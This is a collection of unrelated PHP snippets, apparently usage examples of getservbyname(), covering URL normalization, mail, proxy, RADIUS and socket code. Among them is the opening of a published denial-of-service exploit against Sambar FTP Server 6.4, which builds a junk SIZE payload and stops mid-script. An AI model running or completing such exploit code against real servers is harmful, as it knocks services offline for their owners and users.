function __construct($params) { if (isset($params['mailname'])) { $this->mailname = $params['mailname']; } else { if (function_exists('posix_uname')) { $uname = posix_uname(); $this->mailname = $uname['nodename']; } } if (isset($params['port'])) { $this->_port = $params['port']; } else { $this->_port = getservbyname('smtp', 'tcp'); } if (isset($params['timeout'])) { $this->timeout = $params['timeout']; } if (isset($params['verp'])) { $this->verp = $params['verp']; } if (isset($params['test'])) { $this->test = $params['test']; } if (isset($params['peardebug'])) { $this->test = $params['peardebug']; } if (isset($params['netdns'])) { $this->withNetDns = $params['netdns']; } }
function normalize_url($url) { $purl = @parse_url($url); if (!$purl) { return false; } $scheme = $host = $port = $user = $pass = $path = $query = $fragment = false; extract($purl); if ($scheme) { $scheme = strtolower($scheme); } if ($host) { $host = strtolower($host); } if ($port and $port == getservbyname($scheme, 'tcp')) { $port = false; } foreach (array('user', 'pass', 'host', 'path') as $p) { if (${$p}) { ${$p} = preg_replace('/%[0-9a-f]{2}/ie', 'strtoupper("\\0")', ${$p}); } } if ($path) { $path = _restore_allowed_chars(_remove_dot_segments($path)); } if ($host && !$path) { $path = '/'; } $newurl = $scheme . '://'; if ($host) { if ($user) { $newurl .= $user; if ($pass) { $newurl .= ':' . $pass; } $newurl .= '@'; } $newurl .= $host; if ($port) { $newurl .= ':' . $port; } } $newurl .= $path; if ($query) { $q = array(); foreach (explode('&', $query) as $s) { if ($s and preg_match('/[^=]+=[^=]+/', $s)) { $q[] = $s; } } if ($q) { sort($q); $newurl .= '?' . implode('&', $q); } } if ($fragment) { $newurl .= '#' . $fragment; } return $newurl; }
public function proxify(\Erebot\URIInterface $proxyURI, \Erebot\URIInterface $nextURI) { $credentials = $proxyURI->getUserInfo(); $host = $nextURI->getHost(); $port = $nextURI->getPort(); $scheme = $nextURI->getScheme(); if ($port === null) { $port = getservbyname($scheme, 'tcp'); } if (!is_int($port) || $port <= 0 || $port > 65535) { throw new \Erebot\InvalidValueException('Invalid port'); } $request = ""; $request .= sprintf("CONNECT %s:%d HTTP/1.0\r\n", $host, $port); $request .= sprintf("Host: %s:%d\r\n", $host, $port); $request .= "User-Agent: Erebot/dev-master\r\n"; if ($credentials !== null) { $request .= sprintf("Proxy-Authorization: basic %s\r\n", base64_encode($credentials)); } $request .= "\r\n"; for ($written = 0, $len = strlen($request); $written < $len; $written += $fwrite) { $fwrite = fwrite($this->_socket, substr($request, $written)); if ($fwrite === false) { throw new \Erebot\Exception('Connection closed by proxy'); } } $line = stream_get_line($this->_socket, 4096, "\r\n"); if ($line === false) { throw new \Erebot\InvalidValueException('Invalid response from proxy'); } $this->_logger->debug('%(line)s', array('line' => addcslashes($line, ".."))); $contents = array_filter(explode(" ", $line)); switch ((int) $contents[1]) { case 200: break; case 407: throw new \Erebot\Exception('Proxy authentication required'); default: throw new \Erebot\Exception('Connection rejected by proxy'); } // Avoid an endless loop by limiting the number of headers. // No HTTP server is likely to send more than 2^10 headers anyway. $max = 1 << 10; for ($i = 0; $i < $max; $i++) { $line = stream_get_line($this->_socket, 4096, "\r\n"); if ($line === false) { throw new \Erebot\InvalidValueException('Invalid response from proxy'); } if ($line == "") { break; } $this->_logger->debug('%(line)s', array('line' => addcslashes($line, ".."))); } if ($i === $max) { throw new \Erebot\InvalidValueException('Endless loop detected in proxy response'); } }
function RADIUS_AUTHENTICATION($username, $password) { global $debug; global $SERVER_ADDR; $radiushost = ""; $sharedsecret = ""; $suffix = ""; init_radiusconfig(&$radiushost, &$radiusport, &$sharedsecret, &$suffix); // check your /etc/services. Some radius servers // listen on port 1812, some on 1645. if ($radiusport == 0) { $radiusport = getservbyname("radius", "udp"); } $nasIP = explode(".", $SERVER_ADDR); $ip = gethostbyname($radiushost); // 17 is UDP, formerly known as PROTO_UDP $sock = socket_create(AF_INET, SOCK_DGRAM, 17); $retval = socket_connect($sock, $ip, $radiusport); if (!preg_match("/@/", $username)) { $username .= $suffix; } if ($debug) { echo "<br>radius-port: {$radiusport}<br>radius-host: {$radiushost}<br>username: {$username}<br>suffix: {$suffix}<hr>\n"; } $RA = pack("CCCCCCCCCCCCCCCC", 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255, 1 + rand() % 255); $encryptedpassword = Encrypt($password, $sharedsecret, $RA); $length = 4 + 16 + 6 + 2 + strlen($username) + 2 + strlen($encryptedpassword) + 6 + 6; // nasPort $thisidentifier = rand() % 256; // v v v v v v v v $data = pack("CCCCa*CCCCCCCCa*CCa*CCCCCCCCCCCC", 1, $thisidentifier, $length / 256, $length % 256, $RA, 6, 6, 0, 0, 0, 1, 1, 2 + strlen($username), $username, 2, 2 + strlen($encryptedpassword), $encryptedpassword, 4, 6, $nasIP[0], $nasIP[1], $nasIP[2], $nasIP[3], 5, 3, 0, 0, 0, 0); socket_write($sock, $data, $length); if ($debug) { echo "<br>writing {$length} bytes<hr>\n"; } // // Wait at most five seconds for the answer. Thanks to // Michael Long <*****@*****.**> for his remark about this. // $set = socket_fd_alloc(); socket_fd_zero($set); socket_fd_set($set, $sock); socket_select($set, null, null, 5); if (!socket_fd_isset($set, $sock)) { echo "No answer from radius server, aborting\n"; exit(0); } socket_fd_free($set); $readdata = socket_read($sock, 1); socket_close($sock); return ord($readdata); // 2 -> Access-Accept // 3 -> Access-Reject // See RFC2138 for this. }
/** * Get Host, falls back to Effective Request URI if not found * * @return string */ public function getWithUriFallback() { if (($get = $this->export()) !== null) { // Host defined by the Host directive return $get; } elseif ($this->base !== $this->effective && parse_url($this->base, PHP_URL_HOST) === ($host = parse_url($this->effective, PHP_URL_HOST))) { // Host is the same, but Scheme or Port is different return getservbyname($scheme = parse_url($this->effective, PHP_URL_SCHEME), 'tcp') === parse_url($this->effective, PHP_URL_PORT) ? $scheme . '://' . $host : $this->effective; } // Return Host name only return parse_url($this->effective, PHP_URL_HOST); }
/** * Is listed? * * @param string $uri * @return bool */ public function isListed($uri) { $uriParser = new UriParser($uri); $uri = $uriParser->encode(); $parts = ['scheme' => parse_url($uri, PHP_URL_SCHEME), 'host' => parse_url($uri, PHP_URL_HOST)]; $parts['port'] = is_int($port = parse_url($uri, PHP_URL_PORT)) ? $port : getservbyname($parts['scheme'], 'tcp'); $cases = [$parts['host'], $parts['host'] . ':' . $parts['port'], $parts['scheme'] . '://' . $parts['host'], $parts['scheme'] . '://' . $parts['host'] . ':' . $parts['port']]; foreach ($this->host as $host) { if (in_array($host, $cases)) { return true; } } return false; }
public function isServerSecure() { // Some of these settings are Apache 2.4 specific. // Checks for https on the server and aginst the load // balancer. $httpsPort = intval(getservbyname('https', 'tcp')); $requestSchemeHttps = isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] === "https" : null; $serverHttps = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off'; $serverPortSecure = isset($_SERVER['SERVER_PORT']) ? $httpsPort === $_SERVER['SERVER_PORT'] : null; $forwardHttps = isset($_SERVER['HTTP_X_FORWARDED_PORT']) ? $_SERVER['HTTP_X_FORWARDED_PORT'] === 'https' : null; $forwardProtocolHttps = isset($_SERVER['HTTP_X_FORWARDED_PROTO']) ? $_SERVER['HTTP_X_FORWARDED_PROTO'] === "https" : null; if ($requestSchemeHttps || $serverHttps || $serverPortSecure || $forwardHttps || $forwardProtocolHttps) { return true; } return false; }
/** * Tries to connect to the appropriate port * * @return boolean Returns true or false * @since 2014-11-17 * @author Matthew Daly */ public function checkSite($url) { // Break up the URL data $url_data = parse_url($url); $scheme = $url_data['scheme']; $host = $url_data['host']; // Get port for URL $port = getservbyname($scheme, 'tcp'); // Try to connect to it $fp = @fsockopen($host, $port, $errno, $errstr, 10); $status = $fp ? true : false; if ($fp) { fclose($fp); } unset($fp); // Return response return $status; }
/** * @return string# */ public function getURL() : string { $url = ''; $url .= $this->parts['scheme'] ? $this->parts['scheme'] . ':' : ''; $url .= '//'; $url .= $this->parts['user'] ?: ''; $url .= $this->parts['pass'] ? ':' . $this->parts['pass'] : ''; $url .= $this->parts['user'] || $this->parts['pass'] ? '@' : ''; $url .= $this->parts['host']; if ($this->parts['port']) { $port = @getservbyname($this->parts['scheme'], 'tcp'); $port = $port !== false ? $port : @getservbyname($this->parts['scheme'], 'udp'); $url .= $port != $this->parts['port'] ? ':' . $this->parts['port'] : ''; } $url .= '/' . ltrim($this->parts['path'], '/'); $url .= $this->parts['query'] ? '?' . $this->parts['query'] : ''; $url .= $this->parts['fragment'] ? '#' . $this->parts['fragment'] : ''; return $url; }
private function GetManagesieve() { $this->app = rcmail::get_instance(); // Add include path for internal classes $include_path = $this->app->plugins->dir . 'managesieve/lib' . PATH_SEPARATOR; $include_path .= ini_get('include_path'); set_include_path($include_path); if (empty($this->params['port'])) { $this->params['port'] = getservbyname('sieve', 'tcp'); if (empty($this->params['port'])) { $this->params['port'] = "4190"; } } // try to connect to managesieve server $this->managesieve = new rcube_sieve(method_exists($this->app, get_user_name) ? $this->app->get_user_name() : $_SESSION['username'], method_exists($this->app, get_user_password) ? $this->app->get_user_password() : $this->app->decrypt($_SESSION['password']), $this->params['host'], $this->params['port'], null, $this->params['usetls']); if ($error = $this->managesieve->error()) { $this->ShowError($error); } return $error; }
$pconfig['address'] = $a_aliases[$id]['aliasurl']; } } } if ($_POST) { unset($input_errors); $vertical_bar_err_text = gettext("Vertical bars (|) at start or end, or double in the middle of descriptions not allowed. Descriptions have been cleaned. Check and save again."); /* input validation */ $reqdfields = explode(" ", "name"); $reqdfieldsn = array(gettext("Name")); do_input_validation($_POST, $reqdfields, $reqdfieldsn, $input_errors); $x = is_validaliasname($_POST['name']); if (!isset($x)) { $input_errors[] = gettext("Reserved word used for alias name."); } else { if ($_POST['type'] == "port" && (getservbyname($_POST['name'], "tcp") || getservbyname($_POST['name'], "udp"))) { $input_errors[] = gettext("Reserved word used for alias name."); } else { if (is_validaliasname($_POST['name']) == false) { $input_errors[] = gettext("The alias name must be less than 32 characters long, may not consist of only numbers, and may only contain the following characters") . " a-z, A-Z, 0-9, _."; } } } /* check for name conflicts */ foreach ($a_aliases as $key => $alias) { if ($alias['name'] == $_POST['name'] && (empty($a_aliases[$id]) || $key != $id)) { $input_errors[] = gettext("An alias with this name already exists."); break; } } /* Check for reserved keyword names */
/** * Handles a proxied grab request * * @return bool true to end the response, false to continue trying to handle it * @access private */ function _iframeGrabProxy() { if (!isset($_REQUEST['Iframe_XHR_id'])) { trigger_error('Invalid iframe ID'); return false; } $this->_iframe = $_REQUEST['Iframe_XHR_id']; $this->_payload = isset($_REQUEST['Iframe_XHR_data']) ? $_REQUEST['Iframe_XHR_data'] : ''; $url = urldecode($_GET['px']); $url_parts = parse_url($url); $urlregex = '#^https?://#i'; if (!preg_match($urlregex, $url) || $url_parts['host'] != $_SERVER['HTTP_HOST']) { trigger_error('Invalid URL for grab proxy'); return true; } $method = isset($_REQUEST['Iframe_XHR_HTTP_method']) ? strtoupper($_REQUEST['Iframe_XHR_HTTP_method']) : 'GET'; // validate method if ($method != 'GET' && $method != 'POST') { trigger_error('Invalid grab URL'); return true; } // validate headers $headers = ''; if (isset($_REQUEST['Iframe_XHR_headers'])) { foreach ($_REQUEST['Iframe_XHR_headers'] as $header) { if (strpos($header, "\r") !== false || strpos($header, "\n") !== false) { trigger_error('Invalid grab header'); return true; } $headers .= $header . "\r\n"; } } // tries to make request with file_get_contents() if (ini_get('allow_url_fopen') && version_compare(phpversion(), '5.0.0' . '>=')) { $opts = array($url_parts['scheme'] => array('method' => $method, 'headers' => $headers, 'content' => $this->_payload)); $ret = @file_get_contents($url, false, stream_context_create($opts)); if (!empty($ret)) { $this->_sendResponse($ret); return true; } } // tries to make request using the curl extension if (function_exists('curl_setopt')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ret = curl_exec($ch); if ($ret !== false) { curl_close($ch); $this->_sendResponse($ret); return true; } } if (isset($url_parts['port'])) { $port = $url_parts['port']; } else { $port = getservbyname(strtolower($url_parts['scheme']), 'tcp'); if ($port === false) { trigger_error('Grab proxy: Unknown port or service, defaulting to 80', E_USER_WARNING); $port = 80; } } if (!isset($url_parts['path'])) { $url_parts['path'] = '/'; } if (!empty($url_parts['query'])) { $url_parts['path'] .= '?' . $url_parts['query']; } $request = "{$method} {$url_parts['path']} HTTP/1.0\r\n" . "Host: {$url['host']}\r\n" . "Connection: close\r\n" . "{$headers}\r\n"; // tries to make request using the socket functions $fp = fsockopen($_SERVER['HTTP_HOST'], $port, $errno, $errstr, 4); if ($fp) { fputs($fp, $request); $ret = ''; $done_headers = false; while (!feof($fp)) { $ret .= fgets($fp, 2048); if ($done_headers || ($contentpos = strpos($ret, "\r\n\r\n")) === false) { continue; } $done_headers = true; $ret = substr($ret, $contentpos + 4); } fclose($fp); $this->_sendResponse($ret); return true; } // tries to make the request using the socket extension $host = gethostbyname($url['host']); if (($socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0 || ($connected = socket_connect($socket, $host, $port)) < 0 || ($written = socket_write($socket, $request)) < strlen($request)) { trigger_error('Grab proxy failed: ' . socket_strerror($socket)); return true; } $ret = ''; $done_headers = false; while ($out = socket_read($socket, 2048)) { $ret .= $out; if ($done_headers || ($contentpos = strpos($ret, "\r\n\r\n")) === false) { continue; } $done_headers = true; $ret = substr($ret, $contentpos + 4); } socket_close($socket); $this->_sendResponse($ret); return true; }
/** * @param array $params Additional options: * - debug: (boolean) Activate SMTP debug mode? * DEFAULT: false * - mailname: (string) The name of the local mail system (a valid * hostname which matches the reverse lookup) * DEFAULT: Auto-determined * - netdns: (boolean) Use PEAR:Net_DNS2 (true) or the PHP builtin * getmxrr(). * DEFAULT: true * - port: (integer) Port. * DEFAULT: Auto-determined * - test: (boolean) Activate test mode? * DEFAULT: false * - timeout: (integer) The SMTP connection timeout (in seconds). * DEFAULT: 10 * - verp: (boolean) Whether to use VERP. * If not a boolean, the string value will be used as the VERP * separators. * DEFAULT: false * - vrfy: (boolean) Whether to use VRFY. * DEFAULT: false */ public function __construct(array $params = array()) { /* Try to find a valid mailname. */ if (!isset($params['mailname']) && function_exists('posix_uname')) { $uname = posix_uname(); $params['mailname'] = $uname['nodename']; } if (!isset($params['port'])) { $params['port'] = getservbyname('smtp', 'tcp'); } $this->_params = array_merge(array('debug' => false, 'mailname' => 'localhost', 'netdns' => true, 'port' => 25, 'test' => false, 'timeout' => 10, 'verp' => false, 'vrfy' => false), $params); /* SMTP requires CRLF line endings. */ $this->sep = "\r\n"; }
/** * Returns a normalized Net_URL2 instance. * * @return Net_URL2 */ public function normalize() { // See RFC 3886, section 6 // Schemes are case-insensitive if ($this->_scheme) { $this->_scheme = strtolower($this->_scheme); } // Hostnames are case-insensitive if ($this->_host) { $this->_host = strtolower($this->_host); } // Remove default port number for known schemes (RFC 3986, section 6.2.3) if ($this->_port && $this->_scheme && $this->_port == getservbyname($this->_scheme, 'tcp')) { $this->_port = false; } // Normalize case of %XX percentage-encodings (RFC 3986, section foreach (array('_userinfo', '_host', '_path') as $part) { if ($this->{$part}) { $this->{$part} = preg_replace('/%[0-9a-f]{2}/ie', 'strtoupper("\\0")', $this->{$part}); } } // Path segment normalization (RFC 3986, section $this->_path = self::removeDotSegments($this->_path); // Scheme based normalization (RFC 3986, section 6.2.3) if ($this->_host && !$this->_path) { $this->_path = '/'; } }
/** * Loads configuration, initializes plugin (including sieve connection) */ function start($mode = null) { // register UI objects $this->rc->output->add_handlers(array('filterslist' => array($this, 'filters_list'), 'filtersetslist' => array($this, 'filtersets_list'), 'filterframe' => array($this, 'filter_frame'), 'filterform' => array($this, 'filter_form'), 'filtersetform' => array($this, 'filterset_form'))); // Get connection parameters $host = $this->rc->config->get('managesieve_host', 'localhost'); $port = $this->rc->config->get('managesieve_port'); $tls = $this->rc->config->get('managesieve_usetls', false); $host = rcube_utils::parse_host($host); $host = rcube_utils::idn_to_ascii($host); // remove tls:// prefix, set TLS flag if (($host = preg_replace('|^tls://|i', '', $host, 1, $cnt)) && $cnt) { $tls = true; } if (empty($port)) { $port = getservbyname('sieve', 'tcp'); if (empty($port)) { $port = self::PORT; } } $plugin = $this->rc->plugins->exec_hook('managesieve_connect', array('user' => $_SESSION['username'], 'password' => $this->rc->decrypt($_SESSION['password']), 'host' => $host, 'port' => $port, 'usetls' => $tls, 'auth_type' => $this->rc->config->get('managesieve_auth_type'), 'disabled' => $this->rc->config->get('managesieve_disabled_extensions'), 'debug' => $this->rc->config->get('managesieve_debug', false), 'auth_cid' => $this->rc->config->get('managesieve_auth_cid'), 'auth_pw' => $this->rc->config->get('managesieve_auth_pw'))); // try to connect to managesieve server and to fetch the script $this->sieve = new rcube_sieve($plugin['user'], $plugin['password'], $plugin['host'], $plugin['port'], $plugin['auth_type'], $plugin['usetls'], $plugin['disabled'], $plugin['debug'], $plugin['auth_cid'], $plugin['auth_pw']); if (!($error = $this->sieve->error())) { // Get list of scripts $list = $this->list_scripts(); // reset current script when entering filters UI (#1489412) if ($this->rc->action == 'plugin.managesieve') { $this->rc->session->remove('managesieve_current'); } if ($mode != 'vacation') { if (!empty($_GET['_set']) || !empty($_POST['_set'])) { $script_name = rcube_utils::get_input_value('_set', rcube_utils::INPUT_GPC, true); } else { if (!empty($_SESSION['managesieve_current'])) { $script_name = $_SESSION['managesieve_current']; } } } if ($script_name === null || $script_name === '') { // get (first) active script if (!empty($this->active[0])) { $script_name = $this->active[0]; } else { if ($list) { $script_name = $list[0]; } else { // if script not exists build default script contents $script_file = $this->rc->config->get('managesieve_default'); $script_name = $this->rc->config->get('managesieve_script_name'); if (empty($script_name)) { $script_name = 'roundcube'; } if ($script_file && is_readable($script_file)) { $content = file_get_contents($script_file); } // add script and set it active if ($this->sieve->save_script($script_name, $content)) { $this->activate_script($script_name); $this->list[] = $script_name; } } } } if ($script_name) { $this->sieve->load($script_name); } $error = $this->sieve->error(); } // finally set script objects if ($error) { switch ($error) { case SIEVE_ERROR_CONNECTION: case SIEVE_ERROR_LOGIN: $this->rc->output->show_message('managesieve.filterconnerror', 'error'); rcube::raise_error(array('code' => 403, 'type' => 'php', 'file' => __FILE__, 'line' => __LINE__, 'message' => "Unable to connect to managesieve on {$host}:{$port}"), true, false); break; default: $this->rc->output->show_message('managesieve.filterunknownerror', 'error'); break; } // reload interface in case of possible error when specified script wasn't found (#1489412) if ($script_name !== null && !empty($list) && !in_array($script_name, $list)) { $this->rc->output->command('reload', 500); } // to disable 'Add filter' button set env variable $this->rc->output->set_env('filterconnerror', true); $this->script = array(); } else { $this->exts = $this->sieve->get_extensions(); $this->init_script(); $this->rc->output->set_env('currentset', $this->sieve->current); $_SESSION['managesieve_current'] = $this->sieve->current; } return $error; }
static function getRegSpamScore(&$score, array $user, $verbose, $debug, $model) { $o = XenForo_Application::getOptions(); if (trim($o->TPUDetectSpamRegOpenPort) != '') { if (!function_exists('socket_create')) { $model->logScore('PHP function socket_create() not available, you need the PHP socket extension for open port detection to work', 0); return; } $entries = array(); $socks = array(); foreach (explode("\n", $o->TPUDetectSpamRegOpenPort) as $entry) { $entry = explode('|', trim($entry)); if (count($entry) != 2) { continue; } list($points, $port) = $entry; if (!is_numeric($port)) { $port = getservbyname($port, 'tcp'); } if ($port > 0) { socket_clear_error(); if (self::isIPv6($user['ip'])) { $sock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP); } else { $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); } socket_set_nonblock($sock); @socket_connect($sock, $user['ip'], $port); $errno = socket_last_error(); if ($errno == SOCKET_EALREADY || $errno == SOCKET_EINPROGRESS || $errno == 0) { $socks[] = $sock; } else { socket_close($sock); } $entries[] = array('points' => $points, 'port' => $port, 'open' => false); } } $start = microtime(true); while ($socks && microtime(true) - $start < self::TIMEOUT) { $null = null; $write = $socks; socket_select($null, $write, $null, 1); foreach ($write as $k => $sock) { $errno = socket_get_option($sock, SOL_SOCKET, SO_ERROR); if ($errno == 0) { $entries[$k]['open'] = true; } elseif ($errno == SOCKET_ECONNREFUSED) { } elseif ($errno == SOCKET_ETIMEDOUT) { } else { $errmsg = socket_strerror($errno); } unset($socks[$k]); socket_close($sock); } } foreach ($entries as $entry) { if ($entry['open']) { $model->logScore('tpu_detectspamreg_port_fail', $entry['points'], array('port' => $entry['port'])); $points = $entry['points']; if (is_numeric($points)) { $score['points'] += $points; } else { $score[$points] = true; } } else { if ($debug) { $model->logScore('tpu_detectspamreg_port_ok', 0, array('port' => $entry['port'])); } } } } }
/** * Normalizes the URL * * See RFC 3986, Section 6. Normalization and Comparison * * @link * * @return void */ public function normalize() { // See RFC 3986, section 6 // Scheme is case-insensitive if ($this->_scheme) { $this->_scheme = strtolower($this->_scheme); } // Hostname is case-insensitive if ($this->_host) { $this->_host = strtolower($this->_host); } // Remove default port number for known schemes (RFC 3986, section 6.2.3) if ('' === $this->_port || $this->_port && $this->_scheme && $this->_port == getservbyname($this->_scheme, 'tcp')) { $this->_port = false; } // Normalize case of %XX percentage-encodings (RFC 3986, section // Normalize percentage-encoded unreserved characters (section $fields = array(&$this->_userinfo, &$this->_host, &$this->_path, &$this->_query, &$this->_fragment); foreach ($fields as &$field) { if ($field !== false) { $field = $this->_normalize("{$field}"); } } unset($field); // Path segment normalization (RFC 3986, section $this->_path = self::removeDotSegments($this->_path); // Scheme based normalization (RFC 3986, section 6.2.3) if (false !== $this->_host && '' === $this->_path) { $this->_path = '/'; } // path should start with '/' if there is authority (section 3.3.) if (strlen($this->getAuthority()) && strlen($this->_path) && $this->_path[0] !== '/') { $this->_path = '/' . $this->_path; } }
/** * Get port that a certain service uses. * * @param string $service Name of the service * @param string $protocol Protocol (Is either tcp or udp. Default is tcp.) * * @access public * * @return integer Internet port which corresponds to $service */ public function getPort($service) { return @getservbyname($service, strtolower($this->typePort)); }
<?php // getservbyname(服务名,'tcp/udp') 通过服务名获得端口号 echo "HTTP`s default port number is:" . getservbyname("http", 'tcp'); echo '<hr>'; // getservbyport(端口号,'tcp/udp') 通过端口号获得服务名 echo "Port 80`s default service is:" . getservbyport(80, 'tcp'); echo '<hr>'; // fsockopen() 函数在端口port上建立与target所表示资源的连接 // 在端口 80 上与www.apetdog.com建立连接 $http = fsockopen("", 80); // 给服务器发送一个请求 $req = "GET / HTTP/1.1\r\n"; $req .= "\r\n"; $req .= "Connection:Close\r\n\r\n"; // fputs() 写入文件,可用于二进制文件 fputs($http, $req); // 输出请求结果 // feof()测试文件指针是否到了文件结束的位置 fopen()或fsockopen() while (!feof($http)) { echo fgets($http, 1024); } // 关闭连接 fclose($http);
<?php # Sambar FTP Server 6.4 SIZE Denial Of Service # by rgod # mail: retrog at alice dot it # site: # tested on WinXP sp2 error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname(''); $user = "******"; $pass = "******"; $junk = ""; for ($i = 1; $i <= 160; $i++) { $junk .= "./"; } $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; } else { echo "OK.\n"; } $result = socket_connect($socket, $address, $service_port); if ($result < 0) { echo "socket_connect() failed:\n reason: ({$result}) " . socket_strerror($result) . "\n"; } else { echo "OK.\n"; } $out = socket_read($socket, 240); echo $out; $in = "USER " . $user . "\r\n";
/** * eduwitterConnect * * parameters * url -- connection url * method -- 'GET', 'POST' or 'DELETE' * params -- request parameters oauth and post-field * * return * response of request */ protected function eduwitterConnect($prepare) { /** * collecting datas to open socket */ $pu = parse_url($prepare->getUrl()); $port = getservbyname($pu['scheme'], 'tcp'); $path = $pu['path'] . (isset($pu['query']) ? "?" . $pu['query'] : ""); $fsock_host = ($port == 443 ? 'tls://' : '') . $pu['host']; /** * opening socket and recieving */ $fp = fsockopen($fsock_host, $port); if (!$fp) { die("Can not open socket\n"); } fwrite($fp, $prepare->getMethod() . " {$path} HTTP/1.1\r\n"); fwrite($fp, "Host: {$pu['host']}\r\n"); fwrite($fp, $prepare->getHeaderFields() . "\r\n"); fwrite($fp, "\r\n"); fwrite($fp, $prepare->getBodyField()); $buf = ""; while (!feof($fp)) { $buf .= fgets($fp); } fclose($fp); /** * end of connection and parse response data */ /* split response to header and body */ $split_pos = strpos($buf, "\r\n\r\n"); $response_header = substr($buf, 0, $split_pos); $response_body = substr($buf, $split_pos + 4); /* get http status code */ preg_match("/^HTTP\\/[\\d\\.]+ (\\d+) (.+)/", $response_header, $m); $this->last_status_code = $m[1]; $this->last_status_reason = trim($m[2]); // trim word(\r) return $response_body; }
#!/usr/bin/php -q <?php error_reporting(E_ALL); echo '<h2>TCP/IP Connection</h2>\\n'; $service_port = getservbyname('www', 'tcp'); $address = gethostbyname('localhost'); $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket === false) { echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "\n"; } else { echo "OK. \n"; } echo "Attempting to connect to '{$address}' on port '{$service_port}'..."; $result = socket_connect($socket, $address, $service_port); if ($result === false) { echo "socket_connect() failed.\nReason: ({$result}) " . socket_strerror(socket_last_error($socket)) . "\n"; } else { echo "OK.\n"; } $in = "GET / HTTP/1.1\r\n"; //$in = "HEAD / HTTP/1.1\r\n"; $in .= "Host: localhost\r\n"; $in .= "Connection: Close\r\n\r\n"; $in .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"; $in .= "Accept-Encoding: gzip, deflate, sdch"; $out = ''; echo "Sending HTTP HEAD request..."; socket_write($socket, $in, strlen($in)); echo "OK.\n"; echo "Reading response:\n\n"; while ($out = socket_read($socket, 2048)) {
function rs_setcookie($name, $value, $daysexpire = 0, $path = "", $domain = "", $secure = false, $httponly = true) { # Note! The argument $daysexpire is not the same as the argument $expire in the PHP internal function setcookie. # Note! The $path argument is not used if $global_cookies = true global $baseurl_short, $global_cookies; if ($daysexpire == 0) { $expire = 0; } else { $expire = time() + 3600 * 24 * $daysexpire; } if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] === getservbyname("https", "tcp")) { $secure = true; } if ($global_cookies) { # Remove previously set cookies to avoid clashes //setcookie($name, "", time() - 3600, $baseurl_short . "pages/", $domain, $secure, $httponly); //setcookie($name, "", time() - 3600, $baseurl_short, $domain, $secure, $httponly); # Set new cookie setcookie($name, $value, $expire, "/", $domain, $secure, $httponly); } else { # Set new cookie setcookie($name, $value, $expire, $path, $domain, $secure, $httponly); } }
/** * Returns an absolute or relative link * @param boolean $absolute (optional) set to false to return a relative URL * @return type */ public function toString($absolute = true, $forcePort = false) { if (!$absolute) { return \Cx\Core\Core\Controller\Cx::instanciate()->getWebsiteOffsetPath() . '/' . ($this->getMode() != 'backend' ? $this->getLangDir() . '/' : '') . $this->path . (empty($this->fragment) ? '' : '#' . $this->fragment); } $defaultPort = getservbyname($this->protocol, 'tcp'); $portPart = ''; if ($this->port && (!$defaultPort || $this->port != $defaultPort || $forcePort)) { $portPart = ':' . $this->port; } return $this->protocol . '://' . $this->domain . $portPart . $this->toString(false); }
/** * Returns the normalized Uri as stated in RFC 3886, section 6 * * @return ju1ius\Uri **/ public function normalize() { $uri = clone $this; if ($this->isAbsoluteUrl()) { // Schemes are case-insensitive if ($this->scheme) { $uri->setScheme(strtolower($this->scheme)); } // Hostnames are case-insensitive if ($this->host) { $uri->setHost(strtolower($this->host)); } // Remove default port number for known schemes (RFC 3986, section 6.2.3) if ($this->port && $this->scheme && $this->port === getservbyname($this->scheme, 'tcp')) { $uri->setPort(null); } // Normalize case of %XX percentage-encodings (RFC 3986, section foreach (['user', 'pass', 'host', 'path'] as $part) { if ($this->{$part}) { $value = preg_replace_callback('/%[0-9a-f]{2}/iS', function ($matches) { return strtoupper($matches[0]); }, $this->{$part}); $method = 'set' . ucfirst($part); $uri->{$method}($value); } } } // Path segment normalization (RFC 3986, section $uri->setPath(self::removeDotSegments($this->path)); // Scheme based normalization (RFC 3986, section 6.2.3) if ($this->host && !$uri->getPath()) { $uri->setPath('/'); } }
<?php echo "*** Test substituting argument 1 with float values ***\n"; $protocol = "tcp"; $variation_array = array('float 10.5' => 10.5, 'float -10.5' => -10.5, 'float 12.3456789000e10' => 123456789000.0, 'float -12.3456789000e10' => -123456789000.0, 'float .5' => 0.5); foreach ($variation_array as $var) { var_dump(getservbyname($var, $protocol)); }
/** * ソケットを用いてリダイレクトします。 * @param string $url 取得URL */ public function getHtmlBySocket($url) { $array = parse_url($url); $host = $array['host']; $path = $array['path']; $query = $array['query']; // ソケット初期化 $servicePort = getservbyname('www', 'tcp'); $address = gethostbyname($host); // ソケット作成 $socket = new Net_Socket(); if (PEAR::isError($socket) == true) { // 例外発生 throw new ActionMobile_SocketException($socket->getMessage()); } if ($socket === false) { } // ソケット接続 $ret = $socket->connect($address, 80, false); if (PEAR::isError($ret) == true) { // 例外発生 throw new ActionMobile_SocketException($ret->getMessage()); } // リクエスト $in = "GET {$path}?{$query} HTTP/1.0\r\nHost: {$host}\r\nConnection: close\r\n\r\n"; // リクエスト実行 $ret = $socket->write($in); if (PEAR::isError($ret) == true) { // 例外発生 throw new ActionMobile_SocketException($ret->getMessage()); } // 出力データの見捨てる $out = $socket->readAll(); // ソケットを閉じる $socket->disconnect(); }
